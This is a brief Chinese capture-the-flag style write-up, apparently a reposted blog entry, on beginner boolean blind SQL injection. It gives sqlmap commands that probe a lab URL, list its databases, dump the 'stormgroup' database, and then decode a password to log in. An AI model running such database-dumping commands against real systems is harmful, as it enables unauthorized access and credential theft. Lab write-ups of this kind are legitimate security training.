初級 布爾盲注
- 一、查看頁面源代碼,發現注入點
- 二、sqlmap一把梭
- 三、登錄查看到key
一、查看頁面源代碼,發現注入點

二、sqlmap一把梭
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1

查詢庫
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 --dbs

輸出全部資料
┌──(root💀caozhenguo)-[~/桌面]
└─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 -D stormgroup --dump

解碼 status=1 的密碼

三、登錄查看到key

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/287875.html
標籤:其他
上一篇:17-PHP代碼審計——jizhicms1.6.7 sql注入漏洞分析
下一篇:Java多執行緒
